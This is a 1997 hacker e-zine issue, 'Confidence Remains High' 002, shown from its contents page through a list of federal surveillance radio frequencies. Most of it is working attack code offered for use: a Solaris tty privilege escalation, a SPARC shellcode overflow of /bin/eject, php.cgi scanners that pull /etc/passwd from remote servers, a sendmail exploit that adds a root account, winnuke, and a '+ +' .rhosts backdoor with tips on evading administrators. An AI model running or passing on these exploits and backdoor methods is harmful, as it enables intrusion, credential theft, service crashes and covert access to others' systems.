home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh002.txt < prev    next >
Encoding:
Text File  |  1998-06-21  |  87.7 KB  |  2,533 lines

  1. ───────────────────────────────────────────────────────────────────────────────
  2. ===============================================================================
  3. =--------------------=====================================--------------------=
  4. =--------------------= Status : Confidence Remains High. =--------------------=
  5. =--------------------=  Issue : 002.                     =--------------------=
  6. =--------------------=   Date : May 26th  1997.          =--------------------=
  7. =--------------------=====================================--------------------=
  8. ===============================================================================
  9. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  10. ===============================================================================
  11. ───────────────────────────────────────────────────────────────────────────────
  12.                             .:. Site Of The Month .:.
  13. ───────────────────────────────────────────────────────────────────────────────
  14.  
  15. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  16. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  17. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  18.  
  19. ───────────────────────────────────────────────────────────────────────────────
  20.   In This HUUUUUUuuuUUUUUGE Issue :
  21. ───────────────────────────────────────────────────────────────────────────────
  22.  
  23.  -----=>  Section A  :  Introduction And Cover Story.
  24.  
  25.  1. Confidence Remains High Issue 2....................: Tetsu Khan
  26.  2. wh0 the King?......................................: so1o
  27.  3. www.codez.com......................................: fr1day
  28.  
  29.  -----=>  Section B  :  Exploits And Code.
  30.  
  31.  1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes
  32.  2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d
  33.  
  34.  3. Scan For php Vunerable Servers ------=> phpscan.c.: so1o
  35.  4. Use php.cgi To Get Files ------------=> phpget.c..: p1
  36.  
  37.  5. Hiding From Who (incase you didn't read the pilots): so1o
  38.  6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1
  39.  7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith
  40.  8. Windoze NT / 95 Killer : winnuke.c.................: _eci
  41.  
  42.  -----=>  Section C  :  Phones / Scanning / Radio.
  43.  
  44.  1. Federal Bugging Frequencies........................: Weapon-X
  45.  2. 911 Autodialler Script.............................: dk
  46.  3. Cellular Calls Without Cloning.....................: TRON
  47.  
  48.  -----=>  Section D  :  Miscellaneous.
  49.  
  50.  1. Getting Your Exploits Onto Systems.................: so1o
  51.  2. Fakemailing Techniques.............................: so1o
  52.  3. Pascal Credit Card Generator Source................: Lobster Guacamole
  53.  4. in.courierd : backdoor on port 530.................: so1o
  54.  5. UK Laws On Computer Misuse.........................: Darkfool
  55.  6. so1o Gets Busted By CERT...........................: so1o
  56.  7. CERT Advisory CA-97.13 : xlock vunerablity.........: BugTraq
  57.  8. IRiX WWW Server Bugs...............................: Tetsu Khan
  58.  9. Hacking Not-So-Electrical Items....................: Tetsu Khan
  59.  
  60.  -----=>  Section E  :  World News.
  61.  
  62.  1. Amnesty International Hacked.......................: Article from cnet.com
  63.  2. //sToRm// Of sIn Rips Port Pro.....................: so1o
  64.  3. Digital Darkness Lives.............................: so1o
  65.  4. /home/sdr 0wned....................................: so1o
  66.  5. Sendmail 8.8.4 Remote Is Out.......................: so1o
  67.  6. sIn inf0z Part 2...................................: The CodeZero
  68.  
  69.  ------=> Section F  :  Projects.
  70.  
  71.  1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o
  72.  
  73.  -----=> Section G  :  The End.
  74.  
  75. ───────────────────────────────────────────────────────────────────────────────
  76. ===============================================================================
  77. ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
  78. ===============================================================================
  79. ───────────────────────────────────────────────────────────────────────────────
  80.   1. Confidence Remains High Issue 002 : Tetsu Khan
  81. ───────────────────────────────────────────────────────────────────────────────
  82.  
  83. We have been very busy over the last 50 days, but we still managed to put
  84. together the CodeZero Remote Attack Kit, which contains some very cutting
  85. edge tools as well as some very optimised code, we have included all the
  86. programs precompiled to run from a Linux 2.0.x box, this way you dont even
  87. need a compiler to build this shit =) the source will be available when we
  88. can be bothered to put it on our page, so enjoy this second *FREE* issue of...
  89.  
  90.                                                  ...Confidence Remains High!
  91.                                                                         T_K
  92.  
  93. One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the
  94. IRT are cool, and they think I live in Sweden :) Heres a disclaimer, just in
  95. case anyone does get a bit annoyed :
  96.  
  97.  ***************************************************************************
  98.  ** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY **
  99.  **  USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT   **
  100.  **  COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS   **
  101.  **           AND YOUR DOG AND CONFISCATE ALL YOUR SHIT.                  **
  102.  ***************************************************************************
  103.  
  104. ───────────────────────────────────────────────────────────────────────────────
  105.   2. wh0 the King? : so1o
  106. ───────────────────────────────────────────────────────────────────────────────
  107.  
  108. Okay, heres a rundown of the main groups and associations around the scene on
  109. the efnet at this moment in time, as well as some comments and members...
  110.  
  111.   r00t
  112.   ====
  113.  
  114. Many say r00t own us, members include :
  115.  
  116.  aleph1
  117.  Veggie
  118.  tfish
  119.  
  120. As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc,
  121. Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC
  122. security) as well as ALOT of others who are very well known in the underground.
  123. r00t are definately the biggest group on the scene, and easily the most
  124. powerful.
  125.  
  126.   el8
  127.   ===
  128.  
  129. el8 is another very powerful group, with members that between them make el8 a
  130. force to be feared, members include :
  131.  
  132.  prym
  133.  bw-
  134.  tsal
  135.  
  136. Overall, a good group, with some very smart people.
  137.  
  138.   The CodeZero
  139.   ============
  140.  
  141. We d0nt like to talk about ourselves, boosted up to 7 men now :)
  142.  
  143.   The Secret Mouse Society (sms)
  144.   ==============================
  145.  
  146. I dont really know much of this groups true power, but members include...
  147.  
  148.  Calidor
  149.  vertex
  150.  vortex
  151.  
  152. They have many shells traders, and therefore probably alot of influence in the
  153. shells world, as well as experience, quite a large group.
  154.  
  155. I wont even talk about Undernet groups, seeing they continually split, join
  156. other groups, change names, rip other people code, shit like that, basically
  157. acting like 12 year old warez kiddies (take sIn for example, or maybe even
  158. Psychosis.)
  159.  
  160. ───────────────────────────────────────────────────────────────────────────────
  161.   3. www.codez.com : fr1day
  162. ───────────────────────────────────────────────────────────────────────────────
  163.  
  164.  Yah000!!!@# wE gOt A dOmAin!!!@~#
  165.  
  166.  On www.codez.com we will have 40mb of space, this will include the following..
  167.  
  168.  -=[ The Confidence Remains High Distro Point
  169.  
  170.  -=[ The CodeZero Exploits / Programs And Tools Page
  171.  
  172.    -=[ The Solaris 2.4 / 2.5.x Exploit Collection
  173.    -=[ The Solaris Tools Collection
  174.    -=[ The Solaris CodeZero Tools Collection
  175.  
  176.    -=[ The Linux 2.0.x Exploit Collection
  177.    -=[ The Linux Tools Collection
  178.    -=[ The Linux CodeZero Tools Collection
  179.  
  180.    -=[ W1nd0ze And d0S Tools Collection
  181.    -=[ Assorted Text Philes Collection
  182.  
  183.  -=[ The CodeZero FTP Site
  184.  
  185.    -=[ H/P/A/V/C E-Zine Archive
  186.    -=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive
  187.  
  188. So don't delay! GO THERE TODAY!@# And if you can, please link your sites to
  189. www.codez.com, as we would be very grateful :) Seeing we are basically giving
  190. all this shit to you for PHREE!
  191.  
  192.                                                                       phr1day
  193. ───────────────────────────────────────────────────────────────────────────────
  194. ===============================================================================
  195. ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
  196. ===============================================================================
  197. ───────────────────────────────────────────────────────────────────────────────
  198.   1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes
  199. ───────────────────────────────────────────────────────────────────────────────
  200.  
  201. /*
  202.     If a tty port that is writeable by the user and owned by root is
  203.     opened and the I_PUSH "ms" ioctl call made followed by an lseek
  204.     the effective uid of the user is changed to root.
  205. */
  206.  
  207. #include <stdio.h>
  208. #include <unistd.h>
  209. #include <fcntl.h>
  210. #include <sys/types.h>
  211. #include <stropts.h>
  212. #include <sys/stat.h>
  213. #include <sys/conf.h>
  214.  
  215. main(argc, argv)
  216.     int         argc;
  217.     char*       argv[];
  218. {
  219.    int         fd;
  220.  
  221.    if (argc < 2)
  222.         {
  223.         fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
  224.         exit(1);
  225.         }
  226.  
  227.     fd = open("/dev/ttyb", O_RDWR);
  228.     printf("Your current effective uid is %d\n", geteuid());
  229.     ioctl(fd, I_PUSH, "ms");
  230.     lseek(fd, 0, 1);
  231.     printf("Your effective uid has been changed to %d\n", geteuid());
  232. }
  233.  
  234. ───────────────────────────────────────────────────────────────────────────────
  235.   2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d
  236. ───────────────────────────────────────────────────────────────────────────────
  237.  
  238. /* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */
  239.  
  240. #include <stdio.h>
  241. #include <stdlib.h>
  242. #include <sys/types.h>
  243. #include <unistd.h>
  244.  
  245. #define BUF_LENGTH 364
  246. #define EXTRA 400
  247. #define STACK_OFFSET 400
  248. #define SPARC_NOP 0xa61cc013
  249.  
  250. u_char sparc_shellcode[] =
  251.  
  252. "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
  253. "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
  254. "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  255. "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
  256. "\x91\xd0\x20\x08"
  257. ;
  258.  
  259. u_long get_sp(void)
  260. {
  261. __asm__("mov %sp,%i0 \n");
  262. }
  263.  
  264. void main(int argc, char *argv[])
  265. {
  266. char buf[BUF_LENGTH + EXTRA + 8];
  267. long targ_addr;
  268. u_long *long_p;
  269. u_char *char_p;
  270. int i, code_length = strlen(sparc_shellcode),dso=0;
  271.  
  272. if(argc > 1) dso=atoi(argv[1]);
  273.  
  274. long_p =(u_long *) buf ;
  275. targ_addr = get_sp() - STACK_OFFSET - dso;
  276. for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  277. *long_p++ = SPARC_NOP;
  278.  
  279. char_p = (u_char *) long_p;
  280.  
  281. for (i = 0; i < code_length; i++)
  282. *char_p++ = sparc_shellcode[i];
  283.  
  284. long_p = (u_long *) char_p;
  285.  
  286. for (i = 0; i < EXTRA / sizeof(u_long); i++)
  287. *long_p++ =targ_addr;
  288.  
  289. printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  290. targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  291. execl("/bin/eject", "eject", & buf[1],(char *) 0);
  292. perror("execl failed");
  293. }
  294.  
  295. ───────────────────────────────────────────────────────────────────────────────
  296.   3. Scan For php Vunerable Servers : phpscan.c : so1o
  297. ───────────────────────────────────────────────────────────────────────────────
  298.  
  299. The next two programs, phpscan.c and phpget.c are fully compiled in the
  300. CodeZero Remote Attack Kit, details about the whole kit in section F, part 2.
  301. These two programs use a hole in the php.cgi code that allows remote users to
  302. read any file on the system that the http daemon has access to.
  303. Vunerable servers I have found include www.2600.com (FreeBSD 2.1), so it does
  304. have some effect, use phpscan.c to scan from a list of hosts, then phpget.c to
  305. retrieve files from the remote hosts.
  306.  
  307. Here begins the c0de...
  308.  
  309. /*
  310.  
  311.   phpscan.c : php.cgi vunerable server scanning program.
  312.   
  313.   Basically a modified phf scanner, by Alhambra of The Guild.
  314.   Modifications to php.cgi by so1o of The CodeZero.
  315.  
  316.   Usage:
  317.         phpscan <infile> <outfile>
  318.  
  319. */
  320.  
  321. #include <sys/stat.h>
  322. #include <sys/types.h>
  323. #include <termios.h>
  324. #include <unistd.h>
  325. #include <stdio.h>
  326. #include <fcntl.h>
  327. #include <sys/syslog.h>
  328. #include <sys/param.h>
  329. #include <sys/times.h>
  330. #ifdef LINUX
  331. #include <sys/time.h>
  332. #endif
  333. #include <unistd.h>
  334. #include <sys/socket.h>
  335. #include <netinet/in.h>
  336. #include <sys/signal.h>
  337. #include <arpa/inet.h>
  338. #include <netdb.h>
  339. int FLAG = 1;
  340. int Call(int signo)
  341. {
  342.  FLAG = 0;
  343. }
  344.  
  345. main (int argc, char *argv[])
  346. {
  347.   char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  348.   int outsocket, serv_len, len,X,c,outfd;
  349.   struct hostent *nametocheck;
  350.   struct sockaddr_in serv_addr;
  351.   struct in_addr outgoing;
  352.  
  353.   char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";
  354.  
  355.   while(fgets(hosta,100,stdin))
  356.     {
  357.       if(hosta[0] == '\0')
  358.       break;
  359.       hosta[strlen(hosta) -1] = '\0';
  360.       write(1,hosta,strlen(hosta)*sizeof(char));
  361.       write(1,"\n",sizeof(char));
  362.       outsocket = socket (AF_INET, SOCK_STREAM, 0);
  363.       memset (&serv_addr, 0, sizeof (serv_addr));
  364.       serv_addr.sin_family = AF_INET;
  365.      
  366.       nametocheck = gethostbyname (hosta);
  367.  
  368.       (void *) memcpy (&outgoing.s_addr,       nametocheck->h_addr_list[0],sizeof       (outgoing.s_addr));
  369.       strcpy (host, inet_ntoa (outgoing));
  370.       serv_addr.sin_addr.s_addr = inet_addr (host);
  371.       serv_addr.sin_port = htons (80);
  372.       signal(SIGALRM,Call);
  373.       FLAG = 1;
  374.  
  375.       alarm(10);    
  376.  
  377.       X=connect (outsocket, (struct sockaddr *)       &serv_addr, sizeof (serv_addr));
  378.       alarm(0);
  379.  
  380.       if(FLAG == 1 && X==0){
  381.        write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
  382.        while((X=read(outsocket,FileBuf,8096))!=0)         write(1,FileBuf,X);
  383.        }
  384.        close (outsocket);   
  385.     }
  386.   return 0;
  387. }
  388.  
  389. ───────────────────────────────────────────────────────────────────────────────
  390.   4. Use php To Get Files : phpget.c : p1
  391. ───────────────────────────────────────────────────────────────────────────────
  392.  
  393. Heres the phpget.c, use it wisely...Some useful files to pull include...
  394.  
  395.   /etc/passwd
  396.   /etc/hosts
  397.   /etc/services
  398.   /etc/syslogd.conf
  399.   /etc/inetd.conf
  400.  
  401. /*
  402.  
  403.   p1 (peewun@heterosexual.com)
  404.  
  405.   This code retrieves a file using php.cgi on a remote system.
  406.   This program is for educational purposes only.  Use it on p1.com.
  407.  
  408. */
  409.  
  410. #include <signal.h>
  411. #include <stdio.h>
  412. #include <sys/param.h>
  413. #include <sys/socket.h>
  414. #include <netinet/in.h>
  415. #include <netdb.h>
  416. #include <stdarg.h>
  417. #include <string.h>
  418.  
  419. FILE    *server;
  420. int sock;
  421.  
  422. void do_connect(char *host, char *toget);
  423. void do_connect(char *host, char *toget)
  424. {
  425.     char inbuf[1024];
  426.     struct sockaddr_in sin;
  427.     struct hostent *hp;
  428.     char *tmpbuf;
  429.  
  430.     hp = gethostbyname(host);
  431.     bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  432.     sin.sin_family = hp->h_addrtype;
  433.     sin.sin_port = htons(80);
  434.     sock = socket(AF_INET, SOCK_STREAM, 0);
  435.  
  436.     if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) {
  437.        printf("Made connection to %s.\n\n", host);
  438.     } else {
  439.        printf("Failed to connect to %s.\n\n",host);
  440.        exit(0);
  441.     }
  442.  
  443.     server=fdopen(sock, "a+");
  444.     fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);
  445.     printf("Output from php.cgi request:\n\n");
  446.     while(1){
  447.        if (fgets(inbuf, 1024, server) == NULL)
  448.           break;
  449.        printf(inbuf);
  450.     }
  451.  
  452. }                       
  453. main(int argc,char **argv)
  454. {
  455.     printf("\nThis program retrieves files off a remote system using php.cgi.\n");
  456.     printf("Author: p1 - peewun@heterosexual.com\n");
  457.     if (argc < 3) {
  458.       printf("Usage: %s <domain> <path and file>\n",argv[0]);
  459.       printf("   Ex: %s www.p1.com /etc/passwd\n",argv[0]);
  460.     }
  461.     else {
  462.       char *buffer;
  463.       (char *)"exit";
  464.       do_connect(argv[1],argv[2]);
  465.       exit(1);
  466.     }
  467. }
  468.  
  469. ───────────────────────────────────────────────────────────────────────────────
  470.   5. Hiding From Who : so1o
  471. ───────────────────────────────────────────────────────────────────────────────
  472.  
  473. Okay, bog standard easy shit, works on nearly all systems depending on security
  474. arrangements, I advise you always try this method first when trying to hide.
  475.  
  476. DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!!
  477.  
  478. Telnet into the system, then type...
  479.  
  480. % cd
  481. % echo "+ +" >> .rhosts
  482.  
  483. If this gives an error, like "Cannot create .rhosts" then try...
  484.  
  485. % cd
  486. % echo "+ +" > .rhosts
  487.  
  488. Next telnet to the machines EXACT address, not 127.0.0.1 or localhost,
  489. this way works the most effectively..as it says "last login from..." and you
  490. don't want your ip to be mentioned, or for anyone to get suspicious, so you
  491. will need to cover your tracks.
  492.  
  493. % telnet machine.host.com
  494.  
  495. (then log in again, using the same L/P)
  496.  
  497. now exit completely, using exit twice.
  498.  
  499. The system is now all set up for you to log in without being seen or logged,
  500. as the + + you echo to the .rhosts file in the users home directory is actually
  501. used so that you can remotely execute commands on the system using rsh, or
  502. login into the system remotely, using rlogin, neither operations require a
  503. password, just a login name, so if the user changes his password, you will
  504. still be able to use this technique, now we can attempt to log into the
  505. system untraced, for this we need to either run linux, or be in a shell,
  506. follow this one, easy step, replace "login" with your login, and host.com
  507. with the EXACT host you want to get into...
  508.  
  509. % rsh -l login host.com csh -i
  510.  
  511. eg...
  512.  
  513. % rsh -l tetsu microsoft.com csh -i
  514.  
  515. This then runs csh (c shell) on the remote host (microsoft) in
  516. interactive mode..you should see something like this...
  517.  
  518. % rsh -l tetsu microsoft.com csh -i
  519.  
  520. ...Thus no control on this tty, blah blah blah
  521. %
  522.  
  523. Now you are in, type who :
  524.  
  525. % who
  526. %
  527.  
  528. w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now
  529. you can proceed to hack the host without having to worry whos watching you.
  530.  
  531. Note : Systems Administrators often look over their users directories for
  532.        .rhosts files, so be aware of that.
  533.  
  534. ───────────────────────────────────────────────────────────────────────────────
  535.   6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1
  536. ───────────────────────────────────────────────────────────────────────────────
  537.  
  538. If modeX would have given us his 884 REMOTE exploit with all the offsets, then
  539. we would have published it, but he didn't, so we ain't :( Have the local version
  540. instead...
  541.  
  542. #!/bin/bash
  543. clear
  544. echo
  545. echo Sendmail 8.8.4 and 8.8.5 local exploit.
  546. echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97.
  547. echo
  548. if [ $1 = "-rm" ]
  549. then
  550.    echo Removing /var/tmp/dead.letter
  551.    echo
  552.    rm -rf /var/tmp/dead.letter
  553.    echo Attempting to continue with exploit.
  554.    echo
  555. fi
  556. if [ -e /var/tmp/dead.letter ]
  557. then
  558.     echo File exists: /var/tmp/dead.letter
  559.     echo
  560.     echo If you wish to run this exploit, please delete it by running this
  561.     echo    exploit with the -rm flag.
  562.     echo
  563. exit
  564. fi
  565. ln -s /etc/passwd /var/tmp/dead.letter
  566. cat >> unf << _EOF_
  567. helo
  568. mail from: very@bad.address.here
  569. rcpt to: another@bad.bad.address
  570. data
  571. owned::0:0:exploitation:/:/bin/sh
  572. .
  573. _EOF_
  574. cat unf | telnet localhost 25 >> /dev/null
  575. rm -rf unf
  576. echo
  577. echo Please wait for dead.letter to possibly be appended to by sendmail.
  578. echo
  579. sleep 10
  580. if grep exploitation /etc/passwd
  581. then
  582.     echo Successful addition of account 'owned' to /etc/passwd, running 'su.'
  583.     su owned
  584. else
  585.     echo Unsuccessful exploitation of symbolic link bug.
  586. fi
  587.  
  588. ───────────────────────────────────────────────────────────────────────────────
  589.   7. Ident Scanner : ident-scan.c : Dave Goldsmith
  590. ───────────────────────────────────────────────────────────────────────────────
  591.  
  592. Very very useful and quick tool, especially if it finds daemons running as root
  593. that shouldn't be...Or even backdoors on high ports.
  594.  
  595. Usage : ident-scan <host> [low port] [high port]
  596.  
  597. /*
  598.  *   ident-scan [v0.15]
  599.  *   This TCP scanner has the additional functionality of retrieving
  600.  *   the username that owns the daemon running on the specified port.
  601.  *   It does this by by attempting to connect to a TCP port, and if it
  602.  *   succeeds, it will send out an ident request to identd on the
  603.  *   remote host.  I believe this to be a flaw in the design of the
  604.  *   protocol, and if it is the developers intent to allow 'reverse'
  605.  *   idents, then it should have been stated clearer in the
  606.  *   rfc(rfc1413).
  607.  *
  608.  *   USES:
  609.  *   It can be useful to determine who is running daemons on high ports
  610.  *   that can be security risks.  It can also be used to search for
  611.  *   misconfigurations such as httpd running as root, other daemons
  612.  *   running under the wrong uids.
  613.  *
  614.  *   COMPILES:  Compiles fine under Linux, BSDI and SunOS 4.1.x.
  615.  *
  616.  *   Dave Goldsmith
  617.  *   <daveg@escape.com>
  618.  */
  619.  
  620. #include <stdio.h>
  621. #include <string.h>
  622. #include <sys/types.h>
  623. #include <sys/socket.h>
  624. #include <errno.h>
  625. #include <fcntl.h>
  626. #include <netinet/in.h>
  627. #include <netdb.h>
  628. #include <unistd.h>
  629.  
  630. enum errlist
  631. {
  632.   BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR
  633. };
  634.  
  635. void
  636. usage(error)
  637. enum errlist error;
  638. {
  639.   fprintf(stderr,"ident-scan: ");
  640.   switch(error)
  641.   {
  642.     case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n");
  643.                    break;
  644.     case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n");
  645.                    break;
  646.     case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n");
  647.                    break;
  648.     case SOCK_ERR: fprintf(stderr,"error: socket() failed\n");
  649.                    break;
  650.   }
  651.   exit(-1);
  652. }
  653.  
  654. struct hostent *
  655. fill_host(machine,host)
  656. char *machine;
  657. struct hostent *host;
  658. {
  659.  
  660.   if ((host=gethostbyname(machine))==NULL)
  661.   {
  662.      if ((host=gethostbyaddr(machine,4,AF_INET))==NULL)
  663.         return(host);
  664.   }
  665.   return(host);
  666. }
  667.  
  668. int
  669. main(argc,argv)
  670. int argc;
  671. char **argv;
  672. {
  673.   struct sockaddr_in forconnect,forport,forident;
  674.   int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport;
  675.   struct servent *service;
  676.   struct hostent *host;
  677.   char identbuf[15], recieved[85], *uid;
  678.  
  679.   if ((argc<2) || (argc>4))
  680.     usage(BAD_ARGS);
  681.   if (argc>2)
  682.      loport=atoi(argv[2]);
  683.   if (argc>3)
  684.      hiport=atoi(argv[3]);
  685.   if ((host=fill_host(argv[1],host))==NULL)
  686.     usage(BAD_HOST);
  687.   forconnect.sin_family=host->h_addrtype;
  688.   forconnect.sin_addr.s_addr=*((long *)host->h_addr);
  689.   forident.sin_family=host->h_addrtype;
  690.   forident.sin_addr.s_addr=*((long *)host->h_addr);
  691.   forident.sin_port=htons(113);
  692.  
  693.   if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
  694.      usage(SOCK_ERR);
  695.   if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0)
  696.      usage(NO_IDENT);
  697.   close(identfd);
  698.  
  699.   for(curport=loport;curport<=hiport;curport++)
  700.   {
  701.      for(i=0;i!=85;i++)
  702.         recieved[i]='\0';
  703.      forconnect.sin_port=htons(curport);
  704.      if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1)
  705.         usage(SOCK_ERR);
  706.  
  707.  
  708.      if (connect(sockfd,(struct sockaddr *)&forconnect,sizeof(forconnect))==0)
  709.      {
  710.        if (getsockname(sockfd,(struct sockaddr *)&forport,&len)==0)
  711.        {
  712.           if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
  713.              usage(SOCK_ERR);
  714.           if (connect(identfd,(struct sockaddr *)&forident,sizeof(forident))==0)
  715.           {
  716.              sprintf(identbuf,"%u,%u",htons(forconnect.sin_port),
  717.                 htons(forport.sin_port));
  718.  
  719.              write(identfd,identbuf,strlen(identbuf)+1);
  720.              read(identfd,recieved,80);
  721.              recieved[strlen(recieved)-1]='\0';
  722.              uid=strrchr(recieved,' ');
  723.              service=getservbyport(forconnect.sin_port,"tcp");
  724.              printf("Port: %3d\tService: %10s\tUserid: %s\n",curport,
  725.                 (service==NULL)?"(?)":service->s_name,uid);
  726.           }
  727.        }
  728.     }
  729.     close(sockfd);
  730.     close(identfd);
  731.   }
  732. }
  733.  
  734. ───────────────────────────────────────────────────────────────────────────────
  735.   8. Windoze NT / 95 Killer : winnuke.c : _eci
  736. ───────────────────────────────────────────────────────────────────────────────
  737.  
  738. /*        winnuke.c - (05/07/97)  By _eci            */
  739. /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
  740.  
  741.  
  742. #include <stdio.h>
  743. #include <string.h>
  744. #include <netdb.h>
  745. #include <netinet/in.h>
  746. #include <sys/types.h>
  747. #include <sys/socket.h>
  748. #include <unistd.h>
  749.  
  750. #define dport 139  /* Attack port: 139 is what we want */
  751.  
  752. int x, s;
  753. char *str = "Bye";  /* Makes no diff */
  754. struct sockaddr_in addr, spoofedaddr;
  755. struct hostent *host;
  756.  
  757.  
  758. int open_sock(int sock, char *server, int port) {
  759.      struct sockaddr_in blah;
  760.      struct hostent *he;
  761.      bzero((char *)&blah,sizeof(blah));
  762.      blah.sin_family=AF_INET;
  763.      blah.sin_addr.s_addr=inet_addr(server);
  764.      blah.sin_port=htons(port);
  765.  
  766.  
  767.     if ((he = gethostbyname(server)) != NULL) {
  768.         bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
  769.     }
  770.     else {
  771.          if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
  772.            perror("gethostbyname()");
  773.            return(-3);
  774.          }
  775.     }
  776.  
  777.         if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
  778.              perror("connect()");
  779.              close(sock);
  780.              return(-4);
  781.         }
  782.         printf("Connected to [%s:%d].\n",server,port);
  783.         return;
  784. }
  785.  
  786.  
  787. void main(int argc, char *argv[]) {
  788.  
  789.      if (argc != 2) {
  790.        printf("Usage: %s <target>\n",argv[0]);
  791.        exit(0);
  792.      }
  793.  
  794.      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  795.         perror("socket()");
  796.         exit(-1);
  797.      }
  798.  
  799.      open_sock(s,argv[1],dport);
  800.  
  801.  
  802.      printf("Sending crash... ");
  803.        send(s,str,strlen(str),MSG_OOB);
  804.        usleep(100000);
  805.      printf("Done!\n");
  806.      close(s);
  807. }
  808.  
  809. ───────────────────────────────────────────────────────────────────────────────
  810. ===============================================================================
  811. ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
  812. ===============================================================================
  813. ───────────────────────────────────────────────────────────────────────────────
  814.  1. Federal Bugging Frequencies : Weapon-X
  815. ───────────────────────────────────────────────────────────────────────────────
  816.  
  817. Commonly Used by Federal Agencies for Bugs, Wireless Microphones,
  818. and Body Wires (also 138-220 mhz, and 399-420 mhz, under 25-50 mw).
  819.  
  820.   149.3500, 165.9125, 167.3375, 167.3425, 167.4875, 168.0115, 
  821.   169.2000, 169.4450, 169.5050, 170.2450, 170.3050, 171.0450,
  822.   171.1050, 171.4500, 171.6000, 171.7500, 171.8450, 171.8500,
  823.   171.9050, 172.0000, 172.2000, 172.2125, 172.2375, 172.2625,
  824.   172.2875, 172.3125, 172.3375, 172.3625, 172.3875, 172.5500
  825.   173.3375 
  826.  
  827.   169.445, 169.505, 170.245, 170.305, 171.045, 171.105, 171.845, 171.905
  828.  
  829.   27.5750 Customs Low Power <  5 watts
  830.   27.5850 Customs Low Power <  5 watts
  831.  163.1000 Customs Low Power < 30 watts
  832.  418.5750 Customs Low Power < 30 watts
  833.  
  834.  40.1200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
  835.  40.1700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
  836.  40.2200 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
  837.  40.2700 Federal Shared Mobile Locator Tranmitters "Bumper Beepers"
  838.  
  839.  164.9125 FBI Surveillance 
  840.  165.9125 ATF F5 Surveillance
  841.  166.2875 ATF
  842.  170.4125 ATF
  843.  407.8000 Secret Service
  844.  406.2750 Secret Service
  845.  408.5000 Secret Service
  846.  408.9750 Secret Service
  847.         
  848.  172.2000 DOJ/DEA CH.1
  849.  171.6000 DOJ/DEA CH.2 
  850.  418.0500 DEA Low Power
  851.  418.0750 DEA Low Power
  852.  418.5750 DEA Low Power
  853.  418.7500 DEA
  854.  418.6750 DEA
  855.  418.9000 DEA F2 CINDY (416.325) Surveillance
  856.  418.7500 DEA F3 GAIL Surveillance/Strike Force
  857.  418.6750 DEA F4 EMILY (416.325) Surveillance
  858.  
  859.  407.8000 CIA, State Department
  860.  408.0500 Federal Shared
  861.  408.5750 Federal Shared
  862.  409.4000 Federal Shared
  863.  
  864.  960-1215mhz Spread Spectrum Systems (Wideband)
  865.  
  866.  Generally Recognized Federal Bug/Spy Bands
  867.  
  868.  Primary   - 25-50mhz, 135-175mhz, 225-440mhz, 1710-1950mhz, 8.3-12.5ghz
  869.  
